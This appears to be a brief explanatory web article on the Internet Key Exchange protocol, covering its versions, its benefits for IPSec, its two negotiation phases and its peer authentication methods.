Internet Key Exchange (IKE)
Internet key exchange, abbreviated as IKE, is a protocol standard that is used to complement IPSec standard protocol to offer security to VPN negotiation and access to hosts. It enables the exchanging of keys to be used in encryption and authentication through unsecured means such as through the internet.
Two versions of internet key exchange exist, that is, version one (IKEv1) and version 2 (IKEv2). After the first version was established its functions were okay but a key component was missing and this was taken care of in IKEv2.
Benefits of using IKE
Internet key exchange is used to bring more functionality and flexibility to IPSec through providing additional features. Although the latter can be used independently, incorporating IKE makes connectivity between two peers fast as it eliminates the requirement of inputting the IPSec parameters to both peers in a manual way. Other advantages of using IKE include:
- A user is able to stipulate the lifetime of an association that uses IPSec.
- The ability to change encryptions in the course of IPSec sessions.
- Permits certification authority
- It permits dynamic authentication of connected users.
The working of internet key exchange takes place in two steps.
- Step 1: This involves using complex algorithms such as DiffieHellman key exchange to create a valid connection between peers. The used algorithms create shared key which further extends encryption of IKE communication. The result of this step is a bidirectional connection channel which achieves its encryption by utilizing signatures, shared key and/or public key encryption. This first step has two distinct modes; the main mode which is concerned with peer identity protection and aggressive mode which is utilized when the identity of peers doesn’t necessarily need hiding.
- Step 2: in this step, the connected peers use the established channel to agree security negotiations. This leads to the formation of two channels with each one transmitting information in a certain direction. The mode in the second step is called Quick mode
Methods of peer authentication
Under internet key exchange, three methods of peer authentication or verification are provided:
- Verification via a pre-selected secret
- Verification utilizing RSA encrypted nonces and
- Verification utilizing RSA signatures
Internet key exchange has various ways of guaranteeing the integrity of a communication channel, among them, using HM functions. After the set lifetime of a communication channel under IKE expires, the algorithm in use works to reestablish the IKE session.